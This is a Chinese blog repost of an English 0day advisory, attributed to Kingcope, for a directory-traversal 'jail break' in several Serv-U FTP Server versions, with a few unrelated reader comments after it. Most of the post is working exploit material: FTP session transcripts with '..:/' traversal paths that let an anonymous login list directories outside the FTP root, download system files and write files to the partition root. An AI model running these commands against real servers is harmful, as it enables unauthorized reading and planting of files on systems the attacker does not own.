Serv-U FTP Jail Break(越权遍历目录、下载任意文件)

/ 20评 / 0
01.至于你看没看懂,我反正是没看懂。鸟语伤不起。

02.

03.I m better than TESO!

04.CONFIDENTIAL SOURCE MATERIALS!

05.----------------------------------------------------

06.    Serv-U FTP Server Jail Break 0day

07.    Discovered By Kingcope

08.    Year 2011----------------------------------------------------

09.

10.Affected:

11.220 Serv-U FTP Server v7.3 ready...

12.220 Serv-U FTP Server v7.1 ready...

13.220 Serv-U FTP Server v6.4 ready...

14.220 Serv-U FTP Server v8.2 ready...

15.220 Serv-U FTP Server v10.5 ready...

16.----------------------------------------------------

17.C:UserskingcopeDesktop>ftp 192.168.133.134

18.Verbindung mit 192.168.133.134 wurde hergestellt.

19.220 Serv-U FTP Server v6.4 for WinSock ready...

20.Benutzer (192.168.133.134:(none)): ftp                              (anonymous user :>)

21.331 User name okay, please send complete E-mail address as password.

22.Kennwort:

23.230 User logged in, proceed.

24.ftp> cd "/..:/..:/..:/..:/program files"

25.250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files

26.ftp> ls -la

27.200 PORT Command successful.

28.150 Opening ASCII mode data connection for /bin/ls.

29.dr--r--r--   1 user     group           0 Nov 12 21:48 .

30.dr--r--r--   1 user     group           0 Nov 12 21:48 ..

31.drw-rw-rw-   1 user     group           0 Feb 14  2011 Apache Software Foundatio

32.n

33.drw-rw-rw-   1 user     group           0 Feb  5  2011 ComPlus Applications

34.drw-rw-rw-   1 user     group           0 Jul 11 01:06 Common Files

35.drw-rw-rw-   1 user     group           0 Jul  8 16:57 CoreFTPServer

36.drw-rw-rw-   1 user     group           0 Jul 11 01:06 IIS Resources

37.d---------   1 user     group           0 Jul  8 16:12 InstallShield

38.Installation Information

39.drw-rw-rw-   1 user     group           0 Jul 29 15:07 Internet Explorer

40.drw-rw-rw-   1 user     group           0 Jul  8 16:12 Ipswitch

41.drw-rw-rw-   1 user     group           0 Feb 12  2011 Java

42.drw-rw-rw-   1 user     group           0 Jul 26 13:19 NetMeeting

43.drw-rw-rw-   1 user     group           0 Jul 29 14:39 Outlook Express

44.drw-rw-rw-   1 user     group           0 Jul  8 15:39 PostgreSQL

45.drw-rw-rw-   1 user     group           0 Nov 12 21:48 RhinoSoft.com

46.drw-rw-rw-   1 user     group           0 Feb 12  2011 Sun

47.d---------   1 user     group           0 Jul 29 15:13 Uninstall Information

48.drw-rw-rw-   1 user     group           0 Feb  5  2011 VMware

49.drw-rw-rw-   1 user     group           0 Jul  8 15:34 WinRAR

50.drw-rw-rw-   1 user     group           0 Jul 26 13:30 Windows Media Player

51.drw-rw-rw-   1 user     group           0 Feb  5  2011 Windows NT

52.d---------   1 user     group           0 Feb  5  2011 WindowsUpdate

53.226 Transfer complete.

54.FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s

55.ftp>----------------------------------------------------

56.with write perms:

57.ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition----------------------------------------------------

58.and as anonymous ftp:

59.ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes

60.200 PORT Command successful.

61.150 Opening ASCII mode data connection for calc.exe (115712 Bytes).

62.226 Transfer complete.

63.FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s----------------------------------------------------

64.

65.This works to!!! :

66.

67.220 Serv-U FTP Server v7.3 ready...

68.Benutzer (xx.xx.xx.xx:(none)): ftp

69.331 User name okay, please send complete E-mail address as password.

70.Kennwort:

71.230 User logged in, proceed.

72.ftp> ls "-a ..::....:..:..:..:..:..:..:*"

73.200 PORT Command successful.

74.150 Opening ASCII mode data connection for /bin/ls.

75..

76...

77.AUTOEXEC.BAT

78.boot.ini

79.bootfont.bin

80.bsmain_runtime.log

81.CONFIG.SYS

82.Documents and Settings

83.FPSE_search

84.Inetpub

85.IO.SYS

86.log

87.MSDOS.SYS

88.msizap.exe

89.MSOCache

90.mysql

91.NTDETECT.COM

92.ntldr

93.Program Files

94.RavBin

95.RECYCLER

96.Replay.log

97.rising.ini

98.System Volume Information

99.TDDOWNLOAD

100.WCH.CN

101.WINDOWS

102.wmpub

103.226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.

104.FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

105.----------------------------------------------------

106.Sometimes you need to give it the path:

107.

108.ftp> ls "-a ..::....:..:..:..:..:..:..:program files"

109.ftp> ls "-a ..::....:..:..:..:..:..:..:program files*"

110.200 PORT Command successful.

111.150 Opening ASCII mode data connection for /bin/ls.

112..

113...

114.360

115.Adobe

116.ASP.NET

117.CCProxy

118.CE Remote Tools

119.cmak

120.Common Files

121.ComPlus Applications

122.D-Tools

123.FFTPServer

124.HTML Help Workshop

125.IISServer

126.InstallShield Installation Information

127.Intel

128.Internet Explorer

129.Java

130.JavaSoft

131.K-Lite Codec Pack

132.Microsoft ActiveSync

133.Microsoft Analysis Services

134.Microsoft Device Emulator

135.Microsoft MapPoint Web Service Samples

136.Microsoft MapPoint Web Service SDK, Version 4.0

137.Microsoft Office

138.Microsoft Office Servers

139.Microsoft Silverlight

140.Microsoft SQL Server

141.Microsoft Visual SourceSafe

142.Microsoft Visual Studio 8

143.Microsoft.NET

144.MSBuild

145.MSXML 6.0

146.NetMeeting

147.Outlook Express

148.PortMap1.61

149.Reference Assemblies

150.Rising

151.SQLXML 4.0

152.SQLyog Enterprise

153.STS2Setup_2052

154.Symantec

155.Thunder Network

156.TSingVision

157.Uninstall Information

158.Windows Media Player

159.Windows NT

160.WindowsUpdate

161.WinRAR

162.226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.

163.FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s

164.ftp>

======================================================================

fr0m:A8

《 “Serv-U FTP Jail Break(越权遍历目录、下载任意文件)” 》 有 20 条评论

  1. 大盘预测说道:

    不错哦!!我想知道那个首页的音乐的名字!!很好听风格!!

  2. ′ s7ool 、说道:

    @扑克分析仪:这个需要进一步考察!{smile:27}

  3. 扑克分析仪说道:

    这个就是传说中的遍历树吗

  4. ′ s7ool 、说道:

    @无锡seo:我也没看懂!{smile:24}

  5. ′ s7ool 、说道:

    @杨大叔:我也没看懂!{smile:10}

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注